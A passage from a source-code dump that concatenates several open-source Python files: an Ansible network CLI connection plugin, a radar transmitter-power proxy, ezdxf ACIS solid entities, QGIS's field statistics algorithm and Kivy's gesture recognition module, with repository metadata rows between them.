'manually configure ansible_network_os value for this host'
)
self._terminal = terminal_loader.get(network_os, self)
if not self._terminal:
raise AnsibleConnectionFailure('network os %s is not supported' % network_os)
display.vvvv('loaded terminal plugin for network_os %s' % network_os, host=self._play_context.remote_addr)
self._cliconf = cliconf_loader.get(network_os, self)
if self._cliconf:
display.vvvv('loaded cliconf plugin for network_os %s' % network_os, host=self._play_context.remote_addr)
else:
display.vvvv('unable to load cliconf for network_os %s' % network_os)
self.receive()
display.vvvv('firing event: on_open_shell()', host=self._play_context.remote_addr)
self._terminal.on_open_shell()
if self._play_context.become and self._play_context.become_method == 'enable':
display.vvvv('firing event: on_become', host=self._play_context.remote_addr)
auth_pass = self._play_context.become_pass
self._terminal.on_become(passwd=auth_pass)
display.vvvv('ssh connection has completed successfully', host=self._play_context.remote_addr)
self._connected = True
return self
def _update_connection_state(self):
'''
Reconstruct the connection socket_path and check if it exists
If the socket path exists then the connection is active and set
both the _socket_path value to the path and the _connected value
to True. If the socket path doesn't exist, leave the socket path
value to None and the _connected value to False
'''
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(self._play_context.remote_addr, self._play_context.port, self._play_context.remote_user, self._play_context.connection,
self._ansible_playbook_pid)
tmp_path = unfrackpath(C.PERSISTENT_CONTROL_PATH_DIR)
socket_path = unfrackpath(cp % dict(directory=tmp_path))
if os.path.exists(socket_path):
self._connected = True
self._socket_path = socket_path
def reset(self):
'''
Reset the connection
'''
if self._socket_path:
display.vvvv('resetting persistent connection for socket_path %s' % self._socket_path, host=self._play_context.remote_addr)
self.close()
display.vvvv('reset call on connection instance', host=self._play_context.remote_addr)
def close(self):
'''
Close the active connection to the device
'''
# only close the connection if its connected.
if self._connected:
display.debug("closing ssh connection to device")
if self._ssh_shell:
display.debug("firing event: on_close_shell()")
self._terminal.on_close_shell()
self._ssh_shell.close()
self._ssh_shell = None
display.debug("cli session is now closed")
self.paramiko_conn.close()
self.paramiko_conn = None
display.debug("ssh connection has been closed successfully")
self._connected = False
def receive(self, command=None, prompts=None, answer=None, newline=True, prompt_retry_check=False):
'''
Handles receiving of output from command
'''
recv = BytesIO()
handled = False
self._matched_prompt = None
self._matched_cmd_prompt = None
matched_prompt_window = window_count = 0
while True:
data = self._ssh_shell.recv(256)
# when a channel stream is closed, received data will be empty
if not data:
break
recv.write(data)
offset = recv.tell() - 256 if recv.tell() > 256 else 0
recv.seek(offset)
window = self._strip(recv.read())
window_count += 1
if prompts and not handled:
handled = self._handle_prompt(window, prompts, answer, newline)
matched_prompt_window = window_count
elif prompts and handled and prompt_retry_check and matched_prompt_window + 1 == window_count:
# check again even when handled, if same prompt repeats in next window
# (like in the case of a wrong enable password, etc) indicates
# value of answer is wrong, report this as error.
if self._handle_prompt(window, prompts, answer, newline, prompt_retry_check):
raise AnsibleConnectionFailure("For matched prompt '%s', answer is not valid" % self._matched_cmd_prompt)
if self._find_prompt(window):
self._last_response = recv.getvalue()
resp = self._strip(self._last_response)
return self._sanitize(resp, command)
def send(self, command, prompt=None, answer=None, newline=True, sendonly=False, prompt_retry_check=False):
'''
Sends the command to the device in the opened shell
'''
try:
self._history.append(command)
self._ssh_shell.sendall(b'%s\r' % command)
if sendonly:
return
response = self.receive(command, prompt, answer, newline, prompt_retry_check)
return to_text(response, errors='surrogate_or_strict')
except (socket.timeout, AttributeError):
display.vvvv(traceback.format_exc(), host=self._play_context.remote_addr)
raise AnsibleConnectionFailure("timeout trying to send command: %s" % command.strip())
def _strip(self, data):
'''
Removes ANSI codes from device response
'''
for regex in self._terminal.ansi_re:
data = regex.sub(b'', data)
return data
def _handle_prompt(self, resp, prompts, answer, newline, prompt_retry_check=False):
'''
Matches the command prompt and responds
:arg resp: Byte string containing the raw response from the remote
:arg prompts: Sequence of byte strings that we consider prompts for input
:arg answer: Byte string to send back to the remote if we find a prompt.
A carriage return is automatically appended to this string.
:returns: True if a prompt was found in ``resp``. False otherwise
'''
if not isinstance(prompts, list):
prompts = [prompts]
prompts = [re.compile(r, re.I) for r in prompts]
for regex in prompts:
match = regex.search(resp)
if match:
# if prompt_retry_check is enabled to check if same prompt is
# repeated don't send answer again.
if not prompt_retry_check:
self._ssh_shell.sendall(b'%s' % answer)
if newline:
self._ssh_shell.sendall(b'\r')
self._matched_cmd_prompt = match.group()
return True
return False
def _sanitize(self, resp, command=None):
'''
Removes elements from the response before returning to the caller
'''
cleaned = []
for line in resp.splitlines():
if (command and line.strip() == command.strip()) or self._matched_prompt.strip() in line:
continue
cleaned.append(line)
return b'\n'.join(cleaned).strip()
def _find_prompt(self, response):
'''Searches the buffered response for a matching command prompt
'''
errored_response = None
is_error_message = False
for regex in self._terminal.terminal_stderr_re:
if regex.search(response):
is_error_message = True
# Check if error response ends with command prompt if not
# receive it buffered prompt
for regex in self._terminal.terminal_stdout_re:
match = regex.search(response)
if match:
errored_response = response
self._matched_pattern = regex.pattern
self._matched_prompt = match.group()
break
if not is_error_message:
for regex in self._terminal.terminal_stdout_re:
match = regex.search(response)
if match:
self._matched_pattern = regex.pattern
self._matched_prompt = match.group()
if not errored_response:
return True
if errored_response:
raise AnsibleConnectionFailure(errored_response)
return False
| gpl-3.0 | -1,402,785,099,885,922,800 | 37.774067 | 157 | 0.624443 | false |
weightedEights/runDBcheck | RADAR_DATA/20170713.001/Source/Shell/proxies/txcProxy.py | 5 | 2285 | """
Txc proxy.
This proxy handles all communication between the Txc and the
shell programs
"""
from shell.proxies.baseProxy import baseProxy
import os,re
import time
from xmlrpclib import ServerProxy
import siteconfig
class txcProxy(baseProxy):
def __init__(self,experiment):
baseProxy.__init__(self,'txc',experiment)
txcurl = siteconfig.url('txc')
self.remote = ServerProxy(txcurl)
h5buffer = self.exp.h5Buffer
try:
h5buffer.setDynamic('/Tx/Power',[0.0,0.0])
h5buffer.setAttribute('/Tx/Power/Unit','W')
h5buffer.setAttribute('/Tx/Power/Description','Transmitted power')
except Exception,inst:
self.log.exception(inst)
self.log.info('Initialized')
def setup(self,n):
baseProxy.setup(self,n)
section = '%s mode:%d' % (self.exp.dtc,n)
txf = self.exp.experimentConfig.get(section,'txfrequency',0)
try:
# sondrestrom legacy
f = int(txf)
self.powerName = 'txcfrequency%dpower' % (f)
except:
# amisr and new sondrestrom way. The freq is named directly in the exp file
mo = re.match('tx([c0-9]*)frequency([0-9]*)',txf,re.I)
txid = mo.group(1)
txlo = mo.group(2)
self.powerName = 'tx%sfrequency%spower' % (txid,txlo)
def storeData(self,h5buffer,starttime,endtime,vars):
tsub = time.clock()
state = self.remote.getState([starttime,endtime])
esub = time.clock()-tsub
self.log.info('Gathering txc info: %3.2f [secs]' % (esub))
# set boi info
if state[0]['_timediff'] < 60:
h5buffer.h5Dynamic.setOutBoi('/Tx/Power',state[0][self.powerName])
else:
            self.log.error('Txc boi info off in time by: %f secs' % (state[0]['_timediff']))
# set eoi info
if state[1]['_timediff'] < 60:
h5buffer.h5Dynamic.setOutEoi('/Tx/Power',state[1][self.powerName])
else:
            self.log.error('Txc eoi info off in time by: %f secs' % (state[1]['_timediff']))
proxy = txcProxy | gpl-3.0 | -3,221,776,232,844,869,000 | 31.197183 | 91 | 0.550547 | false |
jorgealmerio/QEsg | core/ezdxf/modern/solid3d.py | 1 | 2503 | # Purpose: support for ACIS based 3D entities - BODY, REGION, 3DSOLID
# Created: 24.05.2015
# Copyright (C) 2015, Manfred Moitzi
# License: MIT License
from __future__ import unicode_literals
__author__ = "mozman <[email protected]>"
from contextlib import contextmanager
from .graphics import none_subclass, entity_subclass, ModernGraphicEntity
from ..lldxf.types import convert_tags_to_text_lines, convert_text_lines_to_tags
from ..lldxf.classifiedtags import ClassifiedTags
from ..lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass
from ..tools import crypt
_BODY_TPL = """ 0
BODY
5
0
330
0
100
AcDbEntity
8
0
100
AcDbModelerGeometry
70
1
"""
modeler_geometry_subclass = DefSubclass('AcDbModelerGeometry', {
'version': DXFAttr(70, default=1),
})
class Body(ModernGraphicEntity):
TEMPLATE = ClassifiedTags.from_text(_BODY_TPL)
DXFATTRIBS = DXFAttributes(none_subclass, entity_subclass, modeler_geometry_subclass)
def get_acis_data(self):
modeler_geometry = self.tags.subclasses[2]
text_lines = convert_tags_to_text_lines(tag for tag in modeler_geometry if tag.code in (1, 3))
return crypt.decode(text_lines)
def set_acis_data(self, text_lines):
def cleanup(lines):
for line in lines:
yield line.rstrip().replace('\n', '')
modeler_geometry = self.tags.subclasses[2]
# remove existing text
modeler_geometry[:] = (tag for tag in modeler_geometry if tag.code not in (1, 3))
modeler_geometry.extend(convert_text_lines_to_tags(crypt.encode(cleanup(text_lines))))
@contextmanager
def edit_data(self):
data = ModelerGeometryData(self)
yield data
self.set_acis_data(data.text_lines)
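# Hedged usage sketch (added comment, not part of the original module): editing
# the ACIS text of a BODY entity in place via the edit_data() context manager
# above.  'msp' is an assumed modelspace layout of an ezdxf drawing.
#
#   body = msp.query('BODY')[0]
#   with body.edit_data() as data:
#       print(data.text_lines[:3])   # first lines of the decoded ACIS stream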
class ModelerGeometryData(object):
def __init__(self, body):
self.text_lines = list(body.get_acis_data())
def __str__(self):
return "\n".join(self.text_lines)
def set_text(self, text, sep='\n'):
self.text_lines = text.split(sep)
class Region(Body):
TEMPLATE = ClassifiedTags.from_text(_BODY_TPL.replace('BODY', 'REGION'))
_3DSOLID_TPL = """ 0
3DSOLID
5
0
330
0
100
AcDbEntity
8
0
100
AcDbModelerGeometry
70
1
100
AcDb3dSolid
350
0
"""
class Solid3d(Body):
TEMPLATE = ClassifiedTags.from_text(_3DSOLID_TPL)
DXFATTRIBS = DXFAttributes(
none_subclass,
entity_subclass,
modeler_geometry_subclass,
DefSubclass('AcDb3dSolid', {'history': DXFAttr(350, default=0)})
)
| gpl-3.0 | -2,290,913,446,886,631,700 | 22.175926 | 102 | 0.679584 | false |
tudorbarascu/QGIS | python/plugins/processing/algs/qgis/BasicStatistics.py | 30 | 13335 | # -*- coding: utf-8 -*-
"""
***************************************************************************
BasicStatistics.py
---------------------
Date : November 2016
Copyright : (C) 2016 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Nyall Dawson'
__date__ = 'November 2016'
__copyright__ = '(C) 2016, Nyall Dawson'
import os
import codecs
from qgis.PyQt.QtCore import QVariant
from qgis.PyQt.QtGui import QIcon
from qgis.core import (QgsApplication,
QgsStatisticalSummary,
QgsStringStatisticalSummary,
QgsDateTimeStatisticalSummary,
QgsFeatureRequest,
QgsProcessing,
QgsProcessingException,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterField,
QgsProcessingParameterFileDestination,
QgsProcessingOutputNumber,
QgsProcessingFeatureSource)
from processing.algs.qgis.QgisAlgorithm import QgisAlgorithm
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class BasicStatisticsForField(QgisAlgorithm):
INPUT_LAYER = 'INPUT_LAYER'
FIELD_NAME = 'FIELD_NAME'
OUTPUT_HTML_FILE = 'OUTPUT_HTML_FILE'
MIN = 'MIN'
MAX = 'MAX'
COUNT = 'COUNT'
UNIQUE = 'UNIQUE'
EMPTY = 'EMPTY'
FILLED = 'FILLED'
MIN_LENGTH = 'MIN_LENGTH'
MAX_LENGTH = 'MAX_LENGTH'
MEAN_LENGTH = 'MEAN_LENGTH'
CV = 'CV'
SUM = 'SUM'
MEAN = 'MEAN'
STD_DEV = 'STD_DEV'
RANGE = 'RANGE'
MEDIAN = 'MEDIAN'
MINORITY = 'MINORITY'
MAJORITY = 'MAJORITY'
FIRSTQUARTILE = 'FIRSTQUARTILE'
THIRDQUARTILE = 'THIRDQUARTILE'
IQR = 'IQR'
def icon(self):
return QgsApplication.getThemeIcon("/algorithms/mAlgorithmBasicStatistics.svg")
def svgIconPath(self):
return QgsApplication.iconPath("/algorithms/mAlgorithmBasicStatistics.svg")
def tags(self):
return self.tr(
'stats,statistics,date,time,datetime,string,number,text,table,layer,sum,maximum,minimum,mean,average,standard,deviation,'
'count,distinct,unique,variance,median,quartile,range,majority,minority,summary').split(',')
def group(self):
return self.tr('Vector analysis')
def groupId(self):
return 'vectoranalysis'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterFeatureSource(self.INPUT_LAYER,
self.tr('Input layer'),
types=[QgsProcessing.TypeVector]))
self.addParameter(QgsProcessingParameterField(self.FIELD_NAME,
self.tr('Field to calculate statistics on'),
None, self.INPUT_LAYER, QgsProcessingParameterField.Any))
self.addParameter(QgsProcessingParameterFileDestination(self.OUTPUT_HTML_FILE, self.tr('Statistics'),
self.tr('HTML files (*.html)'), None, True))
self.addOutput(QgsProcessingOutputNumber(self.COUNT, self.tr('Count')))
self.addOutput(QgsProcessingOutputNumber(self.UNIQUE, self.tr('Number of unique values')))
self.addOutput(QgsProcessingOutputNumber(self.EMPTY, self.tr('Number of empty (null) values')))
self.addOutput(QgsProcessingOutputNumber(self.FILLED, self.tr('Number of non-empty values')))
self.addOutput(QgsProcessingOutputNumber(self.MIN, self.tr('Minimum value')))
self.addOutput(QgsProcessingOutputNumber(self.MAX, self.tr('Maximum value')))
self.addOutput(QgsProcessingOutputNumber(self.MIN_LENGTH, self.tr('Minimum length')))
self.addOutput(QgsProcessingOutputNumber(self.MAX_LENGTH, self.tr('Maximum length')))
self.addOutput(QgsProcessingOutputNumber(self.MEAN_LENGTH, self.tr('Mean length')))
self.addOutput(QgsProcessingOutputNumber(self.CV, self.tr('Coefficient of Variation')))
self.addOutput(QgsProcessingOutputNumber(self.SUM, self.tr('Sum')))
self.addOutput(QgsProcessingOutputNumber(self.MEAN, self.tr('Mean value')))
self.addOutput(QgsProcessingOutputNumber(self.STD_DEV, self.tr('Standard deviation')))
self.addOutput(QgsProcessingOutputNumber(self.RANGE, self.tr('Range')))
self.addOutput(QgsProcessingOutputNumber(self.MEDIAN, self.tr('Median')))
self.addOutput(QgsProcessingOutputNumber(self.MINORITY, self.tr('Minority (rarest occurring value)')))
self.addOutput(QgsProcessingOutputNumber(self.MAJORITY, self.tr('Majority (most frequently occurring value)')))
self.addOutput(QgsProcessingOutputNumber(self.FIRSTQUARTILE, self.tr('First quartile')))
self.addOutput(QgsProcessingOutputNumber(self.THIRDQUARTILE, self.tr('Third quartile')))
self.addOutput(QgsProcessingOutputNumber(self.IQR, self.tr('Interquartile Range (IQR)')))
def name(self):
return 'basicstatisticsforfields'
def displayName(self):
return self.tr('Basic statistics for fields')
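    # Hedged usage sketch (added comment, not part of the original algorithm):
    # running it from the QGIS Python console via the Processing framework.
    # The layer, field name and output path below are placeholders.
    #
    #   import processing
    #   res = processing.run('qgis:basicstatisticsforfields',
    #                        {'INPUT_LAYER': layer,
    #                         'FIELD_NAME': 'population',
    #                         'OUTPUT_HTML_FILE': '/tmp/stats.html'})
    #   print(res['MEAN'], res['STD_DEV'])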
def processAlgorithm(self, parameters, context, feedback):
source = self.parameterAsSource(parameters, self.INPUT_LAYER, context)
if source is None:
raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT_LAYER))
field_name = self.parameterAsString(parameters, self.FIELD_NAME, context)
field = source.fields().at(source.fields().lookupField(field_name))
output_file = self.parameterAsFileOutput(parameters, self.OUTPUT_HTML_FILE, context)
request = QgsFeatureRequest().setFlags(QgsFeatureRequest.NoGeometry).setSubsetOfAttributes([field_name],
source.fields())
features = source.getFeatures(request, QgsProcessingFeatureSource.FlagSkipGeometryValidityChecks)
count = source.featureCount()
data = []
data.append(self.tr('Analyzed field: {}').format(field_name))
results = {}
if field.isNumeric():
d, results = self.calcNumericStats(features, feedback, field, count)
data.extend(d)
elif field.type() in (QVariant.Date, QVariant.Time, QVariant.DateTime):
d, results = self.calcDateTimeStats(features, feedback, field, count)
data.extend(d)
else:
d, results = self.calcStringStats(features, feedback, field, count)
data.extend(d)
if output_file:
self.createHTML(output_file, data)
results[self.OUTPUT_HTML_FILE] = output_file
return results
def calcNumericStats(self, features, feedback, field, count):
total = 100.0 / count if count else 0
stat = QgsStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addVariant(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
cv = stat.stDev() / stat.mean() if stat.mean() != 0 else 0
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.variety(),
self.EMPTY: stat.countMissing(),
self.FILLED: count - stat.countMissing(),
self.MIN: stat.min(),
self.MAX: stat.max(),
self.RANGE: stat.range(),
self.SUM: stat.sum(),
self.MEAN: stat.mean(),
self.MEDIAN: stat.median(),
self.STD_DEV: stat.stDev(),
self.CV: cv,
self.MINORITY: stat.minority(),
self.MAJORITY: stat.majority(),
self.FIRSTQUARTILE: stat.firstQuartile(),
self.THIRDQUARTILE: stat.thirdQuartile(),
self.IQR: stat.interQuartileRange()}
data = []
data.append(self.tr('Count: {}').format(stat.count()))
data.append(self.tr('Unique values: {}').format(stat.variety()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(self.tr('Minimum value: {}').format(stat.min()))
data.append(self.tr('Maximum value: {}').format(stat.max()))
data.append(self.tr('Range: {}').format(stat.range()))
data.append(self.tr('Sum: {}').format(stat.sum()))
data.append(self.tr('Mean value: {}').format(stat.mean()))
data.append(self.tr('Median value: {}').format(stat.median()))
data.append(self.tr('Standard deviation: {}').format(stat.stDev()))
data.append(self.tr('Coefficient of Variation: {}').format(cv))
data.append(self.tr('Minority (rarest occurring value): {}').format(stat.minority()))
data.append(self.tr('Majority (most frequently occurring value): {}').format(stat.majority()))
data.append(self.tr('First quartile: {}').format(stat.firstQuartile()))
data.append(self.tr('Third quartile: {}').format(stat.thirdQuartile()))
data.append(self.tr('Interquartile Range (IQR): {}').format(stat.interQuartileRange()))
return data, results
def calcStringStats(self, features, feedback, field, count):
total = 100.0 / count if count else 1
stat = QgsStringStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addValue(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.countDistinct(),
self.EMPTY: stat.countMissing(),
self.FILLED: stat.count() - stat.countMissing(),
self.MIN: stat.min(),
self.MAX: stat.max(),
self.MIN_LENGTH: stat.minLength(),
self.MAX_LENGTH: stat.maxLength(),
self.MEAN_LENGTH: stat.meanLength()}
data = []
data.append(self.tr('Count: {}').format(count))
data.append(self.tr('Unique values: {}').format(stat.countDistinct()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(self.tr('Minimum value: {}').format(stat.min()))
data.append(self.tr('Maximum value: {}').format(stat.max()))
data.append(self.tr('Minimum length: {}').format(stat.minLength()))
data.append(self.tr('Maximum length: {}').format(stat.maxLength()))
data.append(self.tr('Mean length: {}').format(stat.meanLength()))
return data, results
def calcDateTimeStats(self, features, feedback, field, count):
total = 100.0 / count if count else 1
stat = QgsDateTimeStatisticalSummary()
for current, ft in enumerate(features):
if feedback.isCanceled():
break
stat.addValue(ft[field.name()])
feedback.setProgress(int(current * total))
stat.finalize()
results = {self.COUNT: stat.count(),
self.UNIQUE: stat.countDistinct(),
self.EMPTY: stat.countMissing(),
self.FILLED: stat.count() - stat.countMissing(),
self.MIN: stat.statistic(QgsDateTimeStatisticalSummary.Min),
self.MAX: stat.statistic(QgsDateTimeStatisticalSummary.Max)}
data = []
data.append(self.tr('Count: {}').format(count))
data.append(self.tr('Unique values: {}').format(stat.countDistinct()))
data.append(self.tr('NULL (missing) values: {}').format(stat.countMissing()))
data.append(
self.tr('Minimum value: {}').format(field.displayString(stat.statistic(QgsDateTimeStatisticalSummary.Min))))
data.append(
self.tr('Maximum value: {}').format(field.displayString(stat.statistic(QgsDateTimeStatisticalSummary.Max))))
return data, results
def createHTML(self, outputFile, algData):
with codecs.open(outputFile, 'w', encoding='utf-8') as f:
f.write('<html><head>\n')
f.write('<meta http-equiv="Content-Type" content="text/html; \
charset=utf-8" /></head><body>\n')
for s in algData:
f.write('<p>' + str(s) + '</p>\n')
f.write('</body></html>\n')
| gpl-2.0 | -4,264,691,436,051,176,400 | 45.954225 | 133 | 0.583952 | false |
manashmndl/kivy | kivy/gesture.py | 50 | 14632 | '''
Gesture recognition
===================
This class allows you to easily create new
gestures and compare them::
from kivy.gesture import Gesture, GestureDatabase
# Create a gesture
g = Gesture()
g.add_stroke(point_list=[(1,1), (3,4), (2,1)])
g.normalize()
# Add it to the database
gdb = GestureDatabase()
gdb.add_gesture(g)
# And for the next gesture, try to find it!
g2 = Gesture()
# ...
gdb.find(g2)
.. warning::
You don't really want to do this: it's more of an example of how
to construct gestures dynamically. Typically, you would
need a lot more points, so it's better to record gestures in a file and
reload them to compare later. Look in the examples/gestures directory for
an example of how to do that.
'''
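# Hedged follow-up to the example above (added comment, not in the original
# module): gestures are usually persisted rather than rebuilt by hand.
# GestureDatabase.gesture_to_str() returns a zlib-compressed, base64-encoded
# pickle that can be written to a file and restored with str_to_gesture():
#
#   gdb = GestureDatabase()
#   data = gdb.gesture_to_str(g)      # bytes, safe to store on disk
#   g2 = gdb.str_to_gesture(data)
#   gdb.add_gesture(g2)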
__all__ = ('Gesture', 'GestureDatabase', 'GesturePoint', 'GestureStroke')
import pickle
import base64
import zlib
import math
from kivy.vector import Vector
from io import BytesIO
class GestureDatabase(object):
'''Class to handle a gesture database.'''
def __init__(self):
self.db = []
def add_gesture(self, gesture):
'''Add a new gesture to the database.'''
self.db.append(gesture)
def find(self, gesture, minscore=0.9, rotation_invariant=True):
'''Find a matching gesture in the database.'''
if not gesture:
return
best = None
bestscore = minscore
for g in self.db:
score = g.get_score(gesture, rotation_invariant)
if score < bestscore:
continue
bestscore = score
best = g
if not best:
return
return (bestscore, best)
def gesture_to_str(self, gesture):
'''Convert a gesture into a unique string.'''
io = BytesIO()
p = pickle.Pickler(io)
p.dump(gesture)
data = base64.b64encode(zlib.compress(io.getvalue(), 9))
return data
def str_to_gesture(self, data):
'''Convert a unique string to a gesture.'''
io = BytesIO(zlib.decompress(base64.b64decode(data)))
p = pickle.Unpickler(io)
gesture = p.load()
return gesture
class GesturePoint:
def __init__(self, x, y):
'''Stores the x,y coordinates of a point in the gesture.'''
self.x = float(x)
self.y = float(y)
def scale(self, factor):
''' Scales the point by the given factor.'''
self.x *= factor
self.y *= factor
return self
def __repr__(self):
return 'Mouse_point: %f,%f' % (self.x, self.y)
class GestureStroke:
''' Gestures can be made up of multiple strokes.'''
def __init__(self):
''' A stroke in the gesture.'''
self.points = list()
self.screenpoints = list()
# These return the min and max coordinates of the stroke
@property
def max_x(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.x).x
@property
def min_x(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.x).x
@property
def max_y(self):
if len(self.points) == 0:
return 0
return max(self.points, key=lambda pt: pt.y).y
@property
def min_y(self):
if len(self.points) == 0:
return 0
return min(self.points, key=lambda pt: pt.y).y
def add_point(self, x, y):
'''
add_point(x=x_pos, y=y_pos)
Adds a point to the stroke.
'''
self.points.append(GesturePoint(x, y))
self.screenpoints.append((x, y))
def scale_stroke(self, scale_factor):
'''
scale_stroke(scale_factor=float)
Scales the stroke down by scale_factor.
'''
self.points = [pt.scale(scale_factor) for pt in self.points]
def points_distance(self, point1, point2):
'''
points_distance(point1=GesturePoint, point2=GesturePoint)
Returns the distance between two GesturePoints.
'''
x = point1.x - point2.x
y = point1.y - point2.y
return math.sqrt(x * x + y * y)
def stroke_length(self, point_list=None):
'''Finds the length of the stroke. If a point list is given,
finds the length of that list.
'''
if point_list is None:
point_list = self.points
gesture_length = 0.0
if len(point_list) <= 1: # If there is only one point -> no length
return gesture_length
for i in range(len(point_list) - 1):
gesture_length += self.points_distance(
point_list[i], point_list[i + 1])
return gesture_length
def normalize_stroke(self, sample_points=32):
'''Normalizes strokes so that every stroke has a standard number of
points. Returns True if stroke is normalized, False if it can't be
normalized. sample_points controls the resolution of the stroke.
'''
# If there is only one point or the length is 0, don't normalize
if len(self.points) <= 1 or self.stroke_length(self.points) == 0.0:
return False
# Calculate how long each point should be in the stroke
target_stroke_size = \
self.stroke_length(self.points) / float(sample_points)
new_points = list()
new_points.append(self.points[0])
# We loop on the points
prev = self.points[0]
src_distance = 0.0
dst_distance = target_stroke_size
for curr in self.points[1:]:
d = self.points_distance(prev, curr)
if d > 0:
prev = curr
src_distance = src_distance + d
# The new point need to be inserted into the
# segment [prev, curr]
while dst_distance < src_distance:
x_dir = curr.x - prev.x
y_dir = curr.y - prev.y
ratio = (src_distance - dst_distance) / d
to_x = x_dir * ratio + prev.x
to_y = y_dir * ratio + prev.y
new_points.append(GesturePoint(to_x, to_y))
dst_distance = self.stroke_length(self.points) / \
float(sample_points) * len(new_points)
        # If this happens, we are in trouble...
if not len(new_points) == sample_points:
raise ValueError('Invalid number of strokes points; got '
'%d while it should be %d' %
(len(new_points), sample_points))
self.points = new_points
return True
def center_stroke(self, offset_x, offset_y):
        '''Centers the stroke by offsetting the points.'''
for point in self.points:
point.x -= offset_x
point.y -= offset_y
class Gesture:
'''A python implementation of a gesture recognition algorithm by
Oleg Dopertchouk: http://www.gamedev.net/reference/articles/article2039.asp
Implemented by Jeiel Aranal ([email protected]),
released into the public domain.
'''
# Tolerance for evaluation using the '==' operator
DEFAULT_TOLERANCE = 0.1
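    # Added note (not in the original module): matching is a normalized dot
    # product.  normalize() scales each gesture to a unit square, centers it
    # and resamples every stroke to the same number of points; get_score()
    # then divides the dot product of two gestures by
    # sqrt(self.gesture_product * other.gesture_product), so identical
    # gestures score 1.0.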
def __init__(self, tolerance=None):
'''
Gesture([tolerance=float])
Creates a new gesture with an optional matching tolerance value.
'''
self.width = 0.
self.height = 0.
self.gesture_product = 0.
self.strokes = list()
if tolerance is None:
self.tolerance = Gesture.DEFAULT_TOLERANCE
else:
self.tolerance = tolerance
def _scale_gesture(self):
''' Scales down the gesture to a unit of 1.'''
# map() creates a list of min/max coordinates of the strokes
# in the gesture and min()/max() pulls the lowest/highest value
min_x = min([stroke.min_x for stroke in self.strokes])
max_x = max([stroke.max_x for stroke in self.strokes])
min_y = min([stroke.min_y for stroke in self.strokes])
max_y = max([stroke.max_y for stroke in self.strokes])
x_len = max_x - min_x
self.width = x_len
y_len = max_y - min_y
self.height = y_len
scale_factor = max(x_len, y_len)
if scale_factor <= 0.0:
return False
scale_factor = 1.0 / scale_factor
for stroke in self.strokes:
stroke.scale_stroke(scale_factor)
return True
def _center_gesture(self):
''' Centers the Gesture.points of the gesture.'''
total_x = 0.0
total_y = 0.0
total_points = 0
for stroke in self.strokes:
# adds up all the points inside the stroke
stroke_y = sum([pt.y for pt in stroke.points])
stroke_x = sum([pt.x for pt in stroke.points])
total_y += stroke_y
total_x += stroke_x
total_points += len(stroke.points)
if total_points == 0:
return False
# Average to get the offset
total_x /= total_points
total_y /= total_points
# Apply the offset to the strokes
for stroke in self.strokes:
stroke.center_stroke(total_x, total_y)
return True
def add_stroke(self, point_list=None):
'''Adds a stroke to the gesture and returns the Stroke instance.
Optional point_list argument is a list of the mouse points for
the stroke.
'''
self.strokes.append(GestureStroke())
if isinstance(point_list, list) or isinstance(point_list, tuple):
for point in point_list:
if isinstance(point, GesturePoint):
self.strokes[-1].points.append(point)
elif isinstance(point, list) or isinstance(point, tuple):
if len(point) != 2:
raise ValueError("Stroke entry must have 2 values max")
self.strokes[-1].add_point(point[0], point[1])
else:
raise TypeError("The point list should either be "
"tuples of x and y or a list of "
"GesturePoint objects")
elif point_list is not None:
raise ValueError("point_list should be a tuple/list")
return self.strokes[-1]
def normalize(self, stroke_samples=32):
'''Runs the gesture normalization algorithm and calculates the dot
product with self.
'''
if not self._scale_gesture() or not self._center_gesture():
self.gesture_product = False
return False
for stroke in self.strokes:
stroke.normalize_stroke(stroke_samples)
self.gesture_product = self.dot_product(self)
def get_rigid_rotation(self, dstpts):
'''
Extract the rotation to apply to a group of points to minimize the
distance to a second group of points. The two groups of points are
assumed to be centered. This is a simple version that just picks
an angle based on the first point of the gesture.
'''
if len(self.strokes) < 1 or len(self.strokes[0].points) < 1:
return 0
if len(dstpts.strokes) < 1 or len(dstpts.strokes[0].points) < 1:
return 0
p = dstpts.strokes[0].points[0]
target = Vector([p.x, p.y])
        # Use the first point of this gesture as the source direction; taking
        # the same destination point for both vectors would always yield 0.
        p0 = self.strokes[0].points[0]
        source = Vector([p0.x, p0.y])
return source.angle(target)
def dot_product(self, comparison_gesture):
''' Calculates the dot product of the gesture with another gesture.'''
if len(comparison_gesture.strokes) != len(self.strokes):
return -1
if getattr(comparison_gesture, 'gesture_product', True) is False or \
getattr(self, 'gesture_product', True) is False:
return -1
dot_product = 0.0
for stroke_index, (my_stroke, cmp_stroke) in enumerate(
list(zip(self.strokes, comparison_gesture.strokes))):
for pt_index, (my_point, cmp_point) in enumerate(
list(zip(my_stroke.points, cmp_stroke.points))):
dot_product += (my_point.x * cmp_point.x +
my_point.y * cmp_point.y)
return dot_product
def rotate(self, angle):
g = Gesture()
for stroke in self.strokes:
tmp = []
for j in stroke.points:
v = Vector([j.x, j.y]).rotate(angle)
tmp.append(v)
g.add_stroke(tmp)
g.gesture_product = g.dot_product(g)
return g
def get_score(self, comparison_gesture, rotation_invariant=True):
''' Returns the matching score of the gesture against another gesture.
'''
if isinstance(comparison_gesture, Gesture):
if rotation_invariant:
# get orientation
angle = self.get_rigid_rotation(comparison_gesture)
# rotate the gesture to be in the same frame.
comparison_gesture = comparison_gesture.rotate(angle)
# this is the normal "orientation" code.
